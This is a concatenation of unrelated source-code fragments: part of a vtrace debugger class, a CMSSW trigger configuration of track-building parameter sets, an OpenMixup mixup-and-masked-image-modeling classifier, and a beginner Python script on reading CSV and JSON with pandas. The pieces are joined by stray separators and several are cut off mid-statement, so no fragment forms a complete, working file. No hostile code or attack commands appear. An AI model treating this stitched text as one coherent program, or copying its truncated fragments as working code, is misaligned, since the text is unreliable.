bytez = self.readMemory(va, len(vs))
vs.vsParse(bytez)
return vs
def setVariable(self, name, value):
"""
Set a named variable in the trace which may be used in
subsequent VtraceExpressions.
Example:
trace.setVariable("whereiam", trace.getProgramCounter())
"""
self.localvars[name] = | |
# /dev/CMSSW_8_0_0/GRun/V135 (CMSSW_8_0_12)
import FWCore.ParameterSet.Config as cms
HLTConfigVersion = cms.PSet(
tableName = cms.string('/dev/CMSSW_8_0_0/GRun/V135')
)
HLTPSetInitialStepTrajectoryFilterBase = cms.PSet(
ComponentType = cms.string( "CkfBaseTrajectoryFilter" ),
minimumNumberOfHits = cms.int32( 3 ),
chargeSignificance = cms.double( -1.0 ),
minPt = cms.double( 0.2 ),
nSigmaMinPt = cms.double( 5.0 ),
minHitsMinPt = cms.int32( 3 ),
maxLostHits = cms.int32( 999 ),
maxConsecLostHits = cms.int32( 1 ),
maxNumberOfHits = cms.int32( 100 ),
maxLostHitsFraction = cms.double( 0.1 ),
constantValueForLostHitsFractionFilter = cms.double( 2.0 ),
minNumberOfHitsPerLoop = cms.int32( 4 ),
extraNumberOfHitsBeforeTheFirstLoop = cms.int32( 4 ),
minGoodStripCharge = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutLoose" ) ),
maxCCCLostHits = cms.int32( 2 ),
seedExtension = cms.int32( 0 ),
strictSeedExtension = cms.bool( False ),
seedPairPenalty = cms.int32( 0 ),
minNumberOfHitsForLoopers = cms.int32( 13 )
)
HLTPSetInitialStepTrajectoryBuilder = cms.PSet(
ComponentType = cms.string( "GroupedCkfTrajectoryBuilder" ),
bestHitOnly = cms.bool( True ),
propagatorAlong = cms.string( "PropagatorWithMaterialParabolicMf" ),
trajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetInitialStepTrajectoryFilter" ) ),
inOutTrajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetInitialStepTrajectoryFilter" ) ),
useSameTrajFilter = cms.bool( True ),
maxCand = cms.int32( 3 ),
intermediateCleaning = cms.bool( True ),
lostHitPenalty = cms.double( 30.0 ),
MeasurementTrackerName = cms.string( "" ),
lockHits = cms.bool( True ),
TTRHBuilder = cms.string( "hltESPTTRHBWithTrackAngle" ),
foundHitBonus = cms.double( 5.0 ),
updator = cms.string( "hltESPKFUpdator" ),
alwaysUseInvalidHits = cms.bool( True ),
requireSeedHitsInRebuild = cms.bool( True ),
keepOriginalIfRebuildFails = cms.bool( False ),
estimator = cms.string( "hltESPInitialStepChi2ChargeMeasurementEstimator30" ),
propagatorOpposite = cms.string( "PropagatorWithMaterialParabolicMfOpposite" ),
minNrOfHitsForRebuild = cms.int32( 5 ),
maxDPhiForLooperReconstruction = cms.double( 2.0 ),
maxPtForLooperReconstruction = cms.double( 0.7 )
)
HLTPSetDetachedStepTrajectoryFilterBase = cms.PSet(
ComponentType = cms.string( "CkfBaseTrajectoryFilter" ),
minimumNumberOfHits = cms.int32( 3 ),
chargeSignificance = cms.double( -1.0 ),
minPt = cms.double( 0.075 ),
nSigmaMinPt = cms.double( 5.0 ),
minHitsMinPt = cms.int32( 3 ),
maxLostHits = cms.int32( 999 ),
maxConsecLostHits = cms.int32( 1 ),
maxNumberOfHits = cms.int32( 100 ),
maxLostHitsFraction = cms.double( 0.1 ),
constantValueForLostHitsFractionFilter = cms.double( 2.0 ),
minNumberOfHitsPerLoop = cms.int32( 4 ),
extraNumberOfHitsBeforeTheFirstLoop = cms.int32( 4 ),
minGoodStripCharge = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutLoose" ) ),
maxCCCLostHits = cms.int32( 2 ),
seedExtension = cms.int32( 0 ),
strictSeedExtension = cms.bool( False ),
seedPairPenalty = cms.int32( 0 ),
minNumberOfHitsForLoopers = cms.int32( 13 )
)
HLTPSetDetachedStepTrajectoryBuilder = cms.PSet(
ComponentType = cms.string( "GroupedCkfTrajectoryBuilder" ),
bestHitOnly = cms.bool( True ),
propagatorAlong = cms.string( "PropagatorWithMaterialParabolicMf" ),
trajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetDetachedStepTrajectoryFilter" ) ),
inOutTrajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetDetachedStepTrajectoryFilter" ) ),
useSameTrajFilter = cms.bool( True ),
maxCand = cms.int32( 3 ),
intermediateCleaning = cms.bool( True ),
lostHitPenalty = cms.double( 30.0 ),
MeasurementTrackerName = cms.string( "" ),
lockHits = cms.bool( True ),
TTRHBuilder = cms.string( "hltESPTTRHBWithTrackAngle" ),
foundHitBonus = cms.double( 5.0 ),
updator = cms.string( "hltESPKFUpdator" ),
alwaysUseInvalidHits = cms.bool( False ),
requireSeedHitsInRebuild = cms.bool( True ),
keepOriginalIfRebuildFails = cms.bool( False ),
estimator = cms.string( "hltESPChi2ChargeMeasurementEstimator9" ),
propagatorOpposite = cms.string( "PropagatorWithMaterialParabolicMfOpposite" ),
minNrOfHitsForRebuild = cms.int32( 5 ),
maxDPhiForLooperReconstruction = cms.double( 2.0 ),
maxPtForLooperReconstruction = cms.double( 0.7 )
)
HLTPSetPixelPairStepTrajectoryFilterBase = cms.PSet(
ComponentType = cms.string( "CkfBaseTrajectoryFilter" ),
minimumNumberOfHits = cms.int32( 3 ),
chargeSignificance = cms.double( -1.0 ),
minPt = cms.double( 0.1 ),
nSigmaMinPt = cms.double( 5.0 ),
minHitsMinPt = cms.int32( 3 ),
maxLostHits = cms.int32( 999 ),
maxConsecLostHits = cms.int32( 1 ),
maxNumberOfHits = cms.int32( 100 ),
maxLostHitsFraction = cms.double( 0.1 ),
constantValueForLostHitsFractionFilter = cms.double( 2.0 ),
minNumberOfHitsPerLoop = cms.int32( 4 ),
extraNumberOfHitsBeforeTheFirstLoop = cms.int32( 4 ),
minGoodStripCharge = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutLoose" ) ),
maxCCCLostHits = cms.int32( 2 ),
seedExtension = cms.int32( 0 ),
strictSeedExtension = cms.bool( False ),
seedPairPenalty = cms.int32( 0 ),
minNumberOfHitsForLoopers = cms.int32( 13 )
)
HLTPSetPixelPairStepTrajectoryBuilder = cms.PSet(
ComponentType = cms.string( "GroupedCkfTrajectoryBuilder" ),
bestHitOnly = cms.bool( True ),
propagatorAlong = cms.string( "PropagatorWithMaterialParabolicMf" ),
trajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetPixelPairStepTrajectoryFilter" ) ),
inOutTrajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetPixelPairStepTrajectoryFilter" ) ),
useSameTrajFilter = cms.bool( True ),
maxCand = cms.int32( 3 ),
intermediateCleaning = cms.bool( True ),
lostHitPenalty = cms.double( 30.0 ),
MeasurementTrackerName = cms.string( "" ),
lockHits = cms.bool( True ),
TTRHBuilder = cms.string( "hltESPTTRHBWithTrackAngle" ),
foundHitBonus = cms.double( 5.0 ),
updator = cms.string( "hltESPKFUpdator" ),
alwaysUseInvalidHits = cms.bool( True ),
requireSeedHitsInRebuild = cms.bool( True ),
keepOriginalIfRebuildFails = cms.bool( False ),
estimator = cms.string( "hltESPChi2ChargeMeasurementEstimator9" ),
propagatorOpposite = cms.string( "PropagatorWithMaterialParabolicMfOpposite" ),
minNrOfHitsForRebuild = cms.int32( 5 ),
maxDPhiForLooperReconstruction = cms.double( 2.0 ),
maxPtForLooperReconstruction = cms.double( 0.7 )
)
HLTPSetMixedStepTrajectoryFilterBase = cms.PSet(
ComponentType = cms.string( "CkfBaseTrajectoryFilter" ),
minimumNumberOfHits = cms.int32( 3 ),
seedPairPenalty = cms.int32( 0 ),
chargeSignificance = cms.double( -1.0 ),
minPt = cms.double( 0.05 ),
nSigmaMinPt = cms.double( 5.0 ),
minHitsMinPt = cms.int32( 3 ),
maxLostHits = cms.int32( 0 ),
maxConsecLostHits = cms.int32( 1 ),
maxNumberOfHits = cms.int32( 100 ),
maxLostHitsFraction = cms.double( 0.1 ),
constantValueForLostHitsFractionFilter = cms.double( 2.0 ),
minNumberOfHitsPerLoop = cms.int32( 4 ),
extraNumberOfHitsBeforeTheFirstLoop = cms.int32( 4 ),
minGoodStripCharge = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutNone" ) ),
maxCCCLostHits = cms.int32( 9999 ),
seedExtension = cms.int32( 0 ),
strictSeedExtension = cms.bool( False ),
minNumberOfHitsForLoopers = cms.int32( 13 )
)
HLTPSetMixedStepTrajectoryBuilder = cms.PSet(
ComponentType = cms.string( "GroupedCkfTrajectoryBuilder" ),
bestHitOnly = cms.bool( True ),
propagatorAlong = cms.string( "PropagatorWithMaterialForMixedStep" ),
trajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetMixedStepTrajectoryFilter" ) ),
inOutTrajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetMixedStepTrajectoryFilter" ) ),
useSameTrajFilter = cms.bool( True ),
maxCand = cms.int32( 2 ),
intermediateCleaning = cms.bool( True ),
lostHitPenalty = cms.double( 30.0 ),
MeasurementTrackerName = cms.string( "" ),
lockHits = cms.bool( True ),
TTRHBuilder = cms.string( "hltESPTTRHBWithTrackAngle" ),
foundHitBonus = cms.double( 5.0 ),
updator = cms.string( "hltESPKFUpdator" ),
alwaysUseInvalidHits = cms.bool( True ),
requireSeedHitsInRebuild = cms.bool( True ),
keepOriginalIfRebuildFails = cms.bool( False ),
estimator = cms.string( "hltESPChi2ChargeTightMeasurementEstimator16" ),
propagatorOpposite = cms.string( "PropagatorWithMaterialForMixedStepOpposite" ),
minNrOfHitsForRebuild = cms.int32( 5 ),
maxDPhiForLooperReconstruction = cms.double( 2.0 ),
maxPtForLooperReconstruction = cms.double( 0.7 )
)
HLTPSetPixelLessStepTrajectoryFilterBase = cms.PSet(
ComponentType = cms.string( "CkfBaseTrajectoryFilter" ),
minimumNumberOfHits = cms.int32( 4 ),
chargeSignificance = cms.double( -1.0 ),
minPt = cms.double( 0.05 ),
nSigmaMinPt = cms.double( 5.0 ),
minHitsMinPt = cms.int32( 3 ),
maxLostHits = cms.int32( 0 ),
maxConsecLostHits = cms.int32( 1 ),
maxNumberOfHits = cms.int32( 100 ),
maxLostHitsFraction = cms.double( 0.1 ),
constantValueForLostHitsFractionFilter = cms.double( 1.0 ),
minNumberOfHitsPerLoop = cms.int32( 4 ),
extraNumberOfHitsBeforeTheFirstLoop = cms.int32( 4 ),
minGoodStripCharge = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutNone" ) ),
maxCCCLostHits = cms.int32( 9999 ),
seedExtension = cms.int32( 0 ),
strictSeedExtension = cms.bool( False ),
minNumberOfHitsForLoopers = cms.int32( 13 ),
seedPairPenalty = cms.int32( 0 )
)
HLTPSetPixelLessStepTrajectoryBuilder = cms.PSet(
ComponentType = cms.string( "GroupedCkfTrajectoryBuilder" ),
bestHitOnly = cms.bool( True ),
propagatorAlong = cms.string( "PropagatorWithMaterialParabolicMf" ),
trajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetPixelLessStepTrajectoryFilter" ) ),
inOutTrajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetPixelLessStepTrajectoryFilter" ) ),
useSameTrajFilter = cms.bool( True ),
maxCand = cms.int32( 2 ),
intermediateCleaning = cms.bool( True ),
lostHitPenalty = cms.double( 30.0 ),
MeasurementTrackerName = cms.string( "" ),
lockHits = cms.bool( True ),
TTRHBuilder = cms.string( "hltESPTTRHBWithTrackAngle" ),
foundHitBonus = cms.double( 5.0 ),
updator = cms.string( "hltESPKFUpdator" ),
alwaysUseInvalidHits = cms.bool( False ),
requireSeedHitsInRebuild = cms.bool( True ),
keepOriginalIfRebuildFails = cms.bool( False ),
estimator = cms.string( "hltESPChi2ChargeTightMeasurementEstimator16" ),
propagatorOpposite = cms.string( "PropagatorWithMaterialParabolicMfOpposite" ),
minNrOfHitsForRebuild = cms.int32( 4 ),
maxDPhiForLooperReconstruction = cms.double( 2.0 ),
maxPtForLooperReconstruction = cms.double( 0.7 )
)
transferSystem = cms.PSet(
destinations = cms.vstring( 'Tier0',
'DQM',
'ECAL',
'EventDisplay',
'Lustre',
'None' ),
transferModes = cms.vstring( 'default',
'test',
'emulator' ),
streamA = cms.PSet(
default = cms.vstring( 'Tier0' ),
test = cms.vstring( 'Lustre' ),
emulator = cms.vstring( 'Lustre' )
),
streamCalibration = cms.PSet(
default = cms.vstring( 'Tier0' ),
test = cms.vstring( 'Lustre' ),
emulator = cms.vstring( 'None' )
),
streamDQM = cms.PSet(
default = cms.vstring( 'DQM' ),
test = cms.vstring( 'DQM',
'Lustre' ),
emulator = cms.vstring( 'None' )
),
streamDQMCalibration = cms.PSet(
default = cms.vstring( 'DQM' ),
test = cms.vstring( 'DQM',
'Lustre' ),
emulator = cms.vstring( 'None' )
),
streamEcalCalibration = cms.PSet(
default = cms.vstring( 'ECAL' ),
test = cms.vstring( 'ECAL' ),
emulator = cms.vstring( 'None' )
),
streamEventDisplay = cms.PSet(
default = cms.vstring( 'EventDisplay',
'Tier0' ),
test = cms.vstring( 'EventDisplay',
'Lustre' ),
emulator = cms.vstring( 'None' )
),
streamExpressCosmics = cms.PSet(
default = cms.vstring( 'Tier0' ),
test | |
<reponame>Westlake-AI/openmixup<gh_stars>1-10
import random
import numpy as np
import torch
from torch.autograd import Variable
import torch.nn.functional as F
from openmixup.utils import force_fp32, print_log
from openmixup.models.utils import Canny, Laplacian, Sobel
from .base_model import BaseModel
from .. import builder
from ..registry import MODELS
from ..utils import (cutmix, fmix, mixup, resizemix, saliencymix, smoothmix,
attentivemix, puzzlemix, PlotTensor)
@MODELS.register_module
class MIMClassification(BaseModel):
"""Image Classification with Mixups and MIM.
Args:
backbone (dict): Config dict for module of backbone ConvNet.
neck_cls (dict): Config dict for neck of classification pooling.
neck_mim (dict): Config dict for neck of masked image modeling (MIM) decoder.
head_cls (dict): Config dict for head of classification loss functions.
head_mim (dict): Config dict for head of MIM loss functions.
backbone_k (dict): Config dict for pre-trained backbone. Default: None.
mim_target (None or str): Mode of MIM target. Default: None.
alpha (float or list): To sample Beta distribution in MixUp methods. Build a
list for various mixup methods. Default: 1.
mix_mode (str or list): Basice mixUp methods in input space. Similarly, build
a list for various mix_mode, and randomly choose one mix_mode for each iter.
Default: "mixup".
mix_args (dict): Args for manifoldmix, resizeMix, fmix mode.
mix_prob (list): List of applying prob for given mixup modes. Default: None.
mix_repeat (bool or int): How many time to repeat mixup within a mini-batch. If
mix_repeat > 1, mixup with different alpha and shuffle idx. Default: False.
pretrained (str, optional): Path to pre-trained weights. Default: None.
pretrained_k (str, optional): Path to pre-trained weights for backbone_k.
Default: None.
loss_weights (dict): Loss weights of classification and MIM losses.
"""
def __init__(self,
backbone,
neck_cls=None,
neck_mim=None,
head_cls=None,
head_mim=None,
backbone_k=None,
mim_target=None,
residual=False,
alpha=1.0,
mix_mode="mixup",
mix_args=dict(
attentivemix=dict(grid_size=32, top_k=6, beta=8),
automix=dict(mask_adjust=0, lam_margin=0),
fmix=dict(decay_power=3, size=(32,32), max_soft=0., reformulate=False),
manifoldmix=dict(layer=(0, 3)),
puzzlemix=dict(transport=True, t_batch_size=None, block_num=5, beta=1.2,
gamma=0.5, eta=0.2, neigh_size=4, n_labels=3, t_eps=0.8, t_size=4),
resizemix=dict(scope=(0.1, 0.8), use_alpha=True),
samix=dict(mask_adjust=0, lam_margin=0.08),
),
mix_prob=None,
mix_repeat=False,
momentum_k=-1,
pretrained=None,
pretrained_k=None,
save_name="MIMcls",
loss_weights=dict(
decent_weight=[], accent_weight=[],
weight_mim=1, weight_cls=1,),
init_cfg=None,
**kwargs):
super(MIMClassification, self).__init__(init_cfg, **kwargs)
# networks
self.backbone = builder.build_backbone(backbone)
assert isinstance(neck_cls, dict) and isinstance(neck_mim, dict)
self.neck_cls = builder.build_neck(neck_cls)
self.neck_mim = builder.build_neck(neck_mim)
assert isinstance(head_cls, dict) and isinstance(head_mim, dict)
self.head_cls = builder.build_head(head_cls)
self.head_mim = builder.build_head(head_mim)
self.head = self.head_cls
self.backbone_k = None
self.momentum_k = momentum_k
if backbone_k is not None:
self.backbone_k = builder.build_backbone(backbone_k)
for param in self.backbone_k.parameters(): # stop grad k
param.requires_grad = False
self.momentum_k = min(momentum_k, 1)
# mim targets
self.mim_target = mim_target
self.residual = residual
assert self.mim_target in [None, 'canny', 'hog', 'laplacian', 'lbp', 'pretrained', 'sobel',]
if self.mim_target == 'canny':
self.feat_layer = Canny(non_max_suppression=True, edge_smooth=True)
elif self.mim_target == 'laplacian':
self.feat_layer = Laplacian(mode='DoG', use_threshold=False)
elif self.mim_target == 'sobel':
self.feat_layer = Sobel(isotropic=True, use_threshold=False, out_channels=2)
# mixup args
self.mix_mode = mix_mode if isinstance(mix_mode, list) else [str(mix_mode)]
for _mode in self.mix_mode:
assert _mode in [
"vanilla", "mixup", "manifoldmix",
"cutmix", "fmix", "saliencymix", "smoothmix", "resizemix",
"attentivemix", "puzzlemix", ]
if _mode == "manifoldmix":
assert 0 <= min(mix_args[_mode]["layer"]) and max(mix_args[_mode]["layer"]) < 4
if _mode == "resizemix":
assert 0 <= min(mix_args[_mode]["scope"]) and max(mix_args[_mode]["scope"]) <= 1
self.alpha = alpha if isinstance(alpha, list) else [float(alpha)]
assert len(self.alpha) == len(self.mix_mode) and len(self.mix_mode) < 6
self.idx_list = [i for i in range(len(self.mix_mode))]
self.mix_args = mix_args
self.mix_prob = mix_prob if isinstance(mix_prob, list) else None
if self.mix_prob is not None:
assert len(self.mix_prob) == len(self.alpha) and abs(sum(self.mix_prob)-1e-10) <= 1, \
"mix_prob={}, sum={}, alpha={}".format(self.mix_prob, sum(self.mix_prob), self.alpha)
for i in range(1, len(self.mix_prob)):
self.mix_prob[i] = self.mix_prob[i] + self.mix_prob[i-1]
self.mix_repeat = int(mix_repeat) if int(mix_repeat) > 1 else 1
if self.mix_repeat > 1:
print_log("Warning: mix_repeat={} is more than once.".format(self.mix_repeat))
if len(self.mix_mode) < self.mix_repeat:
print_log("Warning: the number of mix_mode={} is less than mix_repeat={}.".format(
self.mix_mode, self.mix_repeat))
# save plots
self.save_name = save_name
self.save = False
self.ploter = PlotTensor(apply_inv=True)
# loss weights
self.loss_weights = loss_weights
for key in loss_weights.keys():
if not isinstance(loss_weights[key], list):
self.loss_weights[key] = float(loss_weights[key]) \
if float(loss_weights[key]) > 0 else 0
self.weight_cls = loss_weights.get("weight_cls", 1.)
self.weight_mim = loss_weights.get("weight_mim", 1.)
self.cos_annealing = 1. # decent from 1 to 0 as cosine
self.init_weights(pretrained=pretrained, pretrained_k=pretrained_k)
def init_weights(self, pretrained=None, pretrained_k=None):
"""Initialize the weights of model.
Args:
pretrained (str, optional): Path to pre-trained weights. Default: None.
pretrained_k (str, optional): Path to pre-trained weights for encoder_k.
Default: None.
"""
# init pre-trained params
if pretrained_k is not None:
print_log('load pre-training from: {}'.format(pretrained_k), logger='root')
if self.backbone_k is not None:
self.backbone_k.init_weights(pretrained=pretrained_k)
# init trainable params
if pretrained is not None:
print_log('load model from: {}'.format(pretrained), logger='root')
self.backbone.init_weights(pretrained=pretrained)
self.neck_cls.init_weights()
self.neck_mim.init_weights()
self.head_cls.init_weights()
self.head_mim.init_weights()
if self.backbone_k is not None and pretrained_k is None:
for param_q, param_k in zip(self.backbone.parameters(),
self.backbone_k.parameters()):
param_k.data.copy_(param_q.data)
@torch.no_grad()
def _update_loss_weights(self):
""" update loss weights according to the cos_annealing scalar """
# cos annealing decent, from 1 to 0
for attr in self.loss_weights["decent_weight"]:
setattr(self, attr, self.loss_weights[attr] * self.cos_annealing)
# cos annealing accent, from 0 to 1
for attr in self.loss_weights["accent_weight"]:
setattr(self, attr, self.loss_weights[attr] * (1-self.cos_annealing))
@torch.no_grad()
def _momentum_update(self):
"""Momentum update of the backbone_k form backbone """
# we don't update q to k when momentum when m<0
if self.momentum_k < 0:
return
for param_q, param_k in zip(self.backbone.parameters(),
self.backbone_k.parameters()):
if self.momentum_k >= 1:
param_k.data.copy_(param_q.data)
else:
param_k.data = param_k.data * self.momentum_k + \
param_q.data * (1. - self.momentum_k)
def _features(self, img, gt_label=None, cur_mode="puzzlemix", **kwargs):
""" generating feature maps or gradient maps """
if cur_mode == "attentivemix":
img = F.interpolate(img,
scale_factor=kwargs.get("feat_size", 224) / img.size(2), mode="bilinear")
features = self.backbone_k(img)[-1]
elif cur_mode == "puzzlemix":
input_var = Variable(img, requires_grad=True)
self.backbone.eval()
self.head_cls.eval()
pred = self.neck_cls([self.backbone(input_var)[-1]])
pred = self.head_cls(pred)
loss = self.head_cls.loss(pred, gt_label)["loss"]
loss.backward(retain_graph=False)
features = torch.sqrt(torch.mean(input_var.grad**2, dim=1)) # grads
# clear grads in models
self.backbone.zero_grad()
self.head_cls.zero_grad()
# return to train
self.backbone.train()
self.head_cls.train()
return features
@torch.no_grad()
def _manifoldmix(self, img, gt_label, alpha, cur_mode="manifoldmix"):
""" pixel-wise manifoldmix for the latent space mixup backbone """
# manifoldmix
lam = np.random.beta(alpha, alpha)
bs = img.size(0)
rand_index = torch.randperm(bs).cuda()
# mixup labels
y_a = gt_label
y_b = gt_label[rand_index]
gt_label = (y_a, y_b, lam)
_layer = np.random.randint(
self.mix_args[cur_mode]["layer"][0], self.mix_args[cur_mode]["layer"][1], dtype=int)
# generate mixup mask
_mask = None
if img.size(3) > 64: # normal version of resnet
scale_factor = 2**(1 + _layer) if _layer > 0 else 1
else: # CIFAR version
scale_factor = 2**(_layer - 1) if _layer > 1 else 1
_mask_size = img.size(3) // scale_factor
_mask = torch.zeros(img.size(0), 1, _mask_size, _mask_size).cuda()
_mask[:] = lam
return rand_index, _layer, _mask, gt_label
def forward_mix(self, img, gt_label, mask=None, remove_idx=-1):
"""computate mini-batch mixup.
Args:
img (Tensor): Input images of shape (N, C, H, W).
Typically these should be mean centered and std scaled.
gt_label (Tensor): Ground-truth labels.
mask (tensor): MIM mask.
remove_idx (int): Remove this idx this time.
Returns:
dict[str, Tensor]: A dictionary of loss components.
"""
# choose a mixup method
if self.mix_prob is None:
candidate_list = self.idx_list.copy()
if 0 <= remove_idx <= len(self.idx_list):
candidate_list.remove(int(remove_idx))
cur_idx = random.choices(candidate_list, k=1)[0]
else:
rand_n = random.random()
for i in range(len(self.idx_list)):
if self.mix_prob[i] > rand_n:
cur_idx = self.idx_list[i]
if cur_idx == remove_idx: # randomly choose one among the rest
candidate_list = self.idx_list.copy()
candidate_list.remove(int(remove_idx))
cur_idx = random.choices(candidate_list, k=1)[0]
break
outputs = dict(cur_idx=cur_idx)
cur_mode, cur_alpha = self.mix_mode[cur_idx], self.alpha[cur_idx]
# applying dynamic methods
if cur_mode in ["attentivemix", "automix", "puzzlemix", "samix",]:
if cur_mode in ["attentivemix", "puzzlemix"]:
features = self._features(
img, gt_label=gt_label, cur_mode=cur_mode, **self.mix_args[cur_mode])
mix_args = dict(alpha=cur_alpha, dist_mode=False,
features=features, **self.mix_args[cur_mode])
img, gt_label = eval(cur_mode)(img, gt_label, **mix_args)
feat = self.backbone(img, mask)
# hand-crafted methods
elif cur_mode not in ["manifoldmix",]:
if cur_mode in ["mixup", "cutmix", "saliencymix", "smoothmix",]:
img, gt_label = eval(cur_mode)(img, gt_label, cur_alpha, dist_mode=False)
elif cur_mode in ["resizemix", "fmix"]:
mix_args = dict(alpha=cur_alpha, dist_mode=False, **self.mix_args[cur_mode])
img, gt_label = eval(cur_mode)(img, gt_label, **mix_args)
else:
assert cur_mode == "vanilla"
feat = self.backbone(img, mask)
else:
# manifoldmix
rand_index, _layer, _mask, gt_label = self._manifoldmix(img, gt_label, cur_alpha)
# args for mixup backbone
mix_args = dict(
layer=_layer, cross_view=False, mask=_mask, BN_shuffle=False, idx_shuffle_BN=None,
idx_shuffle_mix=rand_index, dist_shuffle=False)
# TODO: Not support ManifoldMix now
feat = self.backbone(img, mix_args)
outputs['feat'] = feat
# save mixed img
if self.save and cur_mode != "vanilla":
plot_lam = gt_label[2] if len(gt_label) == 3 else None
self.plot_mix(img_mixed=img, mix_mode=cur_mode, lam=plot_lam)
# mixup loss
outs = self.neck_cls([feat[-1]], mask)
outs = self.head_cls(outs)
losses = self.head_cls.loss(outs, gt_label)
losses['loss'] *= (self.weight_cls / self.mix_repeat)
return losses, outputs
def forward_train(self, img, gt_label, **kwargs):
"""Forward computation during | |
# Data Engineering Process
# There are several steps in Data Engineering process.
# Extract :- Data extraction is getting data from multiple sources. Ex. Data extraction from a website using Web scraping or gathering information from the data that are stored in different formats(JSON, CSV, XLSX etc.).
# Transform :- Tarnsforming the data means removing the data that we don't need for further analysis and converting the data in the format that all the data from the multiple sources is in the same format.
# Load :- Loading the data inside a data warehouse. Data warehouse essentially contains large volumes of data that are accessed to gather insights.
# Working with different file formats
# In real-world, people rarely get neat tabular data. Thus, it is mandatory
# for any data scientist (or a data engineer) to be aware of different file
# formats, common challenges in handling them and the best / efficient ways
# to handle this data in real life. We have reviewed some of this content
# in other modules.
# File Format
# A file format is a standard way in which information is encoded for
# storage in a file. First, the file format specifies whether the file is a
# binary or ASCII file. Second, it shows how the information is organized.
# For example, comma-separated values (CSV) file format stores tabular data
# in plain text.
# To identify a file format, you can usually look at the file extension to
# get an idea. For example, a file saved with name “Data” in “CSV” format
# will appear as “Data.csv”. By noticing “.csv” extension we can clearly
# identify that it is a “CSV” file and data is stored in a tabular format.
# There are various formats for a dataset, .csv, .json, .xlsx etc. The
# dataset can be stored in different places, on your local machine or
# sometimes online.
# In this section, you will learn how to load a dataset into our Jupyter
# Notebook.
# Now, we will look at some file formats and how to read them in Python:
# Comma-separated values(CSV) file format
# Comma-separated values file format falls under spreadsheet file format.
# In spreadsheet file format, data is stored in cells. Each cell is
# organized in rows and columns. A column in the spreadsheet file can have
# different types. For example, a column can be of string type, a date type
# or an integer type.
# Each line in CSV file represents an observation or commonly called a
# record. Each record may contain one or more fields which are separated by
# a comma.
# Reading the data from CSV in Python
# The Pandas Library is a useful tool that enables us to read various
# datasets into a data frame
# Let us look at how to read a CSV file in Pandas Library.
# We use pandas.read_csv() function to read the csv file. In the bracket,
# we put the file path along with a quotation mark, so that pandas will
# read the file into a data frame from that address. The file path can be
# either an URL or your local file address.
import pandas as pd
url ='https://cf-courses-data.s3.us.cloud-object-storage.appdomain.cloud/IBMDeveloperSkillsNetwork-PY0101EN-SkillsNetwork/labs/Module%205/data/addresses.csv'
df = pd.read_csv(url)
df
# Adding column name to the DataFrame
# We can add columns to an existing DataFrame using its columns attribute.
df.columns =['First Name', 'Last Name', 'Location ', 'City','State','Area Code']
df
# Selecting a single column
# To select the first column 'First Name', you can pass the column name as
# a string to the indexing operator.
df["First Name"]
# Selecting multiple columns
# To select multiple columns, you can pass a list of column names to the
# indexing operator.
df = df[['First Name', 'Last Name', 'Location ', 'City','State','Area Code']]
df
# Selecting rows using .iloc and .loc
# Now, let's see how to use .loc for selecting rows from our DataFrame.
# loc() : loc() is label based data selecting method which means that we
# have to pass the name of the row or column which we want to select.
# To select the first row
df.loc[0]
# To select the 0th,1st and 2nd row of "First Name" column only
df.loc[[0,1,2], "First Name" ]
# Now, let's see how to use .iloc for selecting rows from our DataFrame.
# iloc() : iloc() is a indexed based selecting method which means that we
# have to pass integer index in the method to select specific row/column.
# To select the 0th,1st and 2nd row of "First Name" column only
df.iloc[[0,1,2], 0]
# Transform Function in Pandas
# Python’s Transform function returns a self-produced dataframe with
# transformed values after applying the function specified in its parameter.
# Let's see how Transform function works.
#import library
import pandas as pd
import numpy as np
#creating a dataframe
df=pd.DataFrame(np.array([[1, 2, 3], [4, 5, 6], [7, 8, 9]]), columns=['a', 'b', 'c'])
df
# Let’s say we want to add 10 to each element in a dataframe:
# applying the transform function
df = df.transform(func = lambda x : x + 10)
df
# Now we will use DataFrame.transform() function to find the square root
# to each element of the dataframe.
result = df.transform(func = ['sqrt'])
result
# JSON file Format
# JSON (JavaScript Object Notation) is a lightweight data-interchange format.
# It is easy for humans to read and write.
#
# JSON is built on two structures:
# A collection of name/value pairs. In various languages, this is realized as an object, record, struct, dictionary, hash table, keyed list, or associative array.
# An ordered list of values. In most languages, this is realized as an array, vector, list, or sequence.
# JSON is a language-independent data format. It was derived from
# JavaScript, but many modern programming languages include code to
# generate and parse JSON-format data. It is a very common data format,
# with a diverse range of applications.
# The text in JSON is done through quoted string which contains the value
# in key-value mapping within { }. It is similar to the dictionary in
# Python.
# Python supports JSON through a built-in package called json. To use this
# feature, we import the json package in Python script.
import json
# Writing JSON to a File
# This is usually called serialization. It is the process of converting an
# object into a special format which is suitable for transmitting over the
# network or storing in file or database.
# To handle the data flow in a file, the JSON library in Python uses dump()
# or dumps() function to convert the Python objects into their respective
# JSON object, so it makes easy to write data to files.
import json
person = {
'first_name' : 'Mark',
'last_name' : 'abc',
'age' : 27,
'address': {
"streetAddress": "21 2nd Street",
"city": "New York",
"state": "NY",
"postalCode": "10021-3100"
}
}
# serialization using dump() function
# json.dump() method can be used for writing to JSON file.
# Syntax: json.dump(dict, file_pointer)
# Parameters:
# dictionary – name of dictionary which should be converted to JSON object.
# file pointer – pointer of the file opened in write or append mode.
with open('person.json', 'w') as f: # writing JSON object
json.dump(person, f)
# serialization using dumps() function
# json.dumps() that helps in converting a dictionary to a JSON object.
# It takes two parameters:
# dictionary – name of dictionary which should be converted to JSON object.
# indent – defines the number of units for indentation
# Serializing json
json_object = json.dumps(person, indent = 4)
# Writing to sample.json
with open("sample.json", "w") as outfile:
outfile.write(json_object)
print(json_object)
# Our Python objects are now serialized to the file. To deserialize it back
# to the Python object we use the load() function.
#Reading JSON to a File
# This process is usually called Deserialization: It is the reverse of
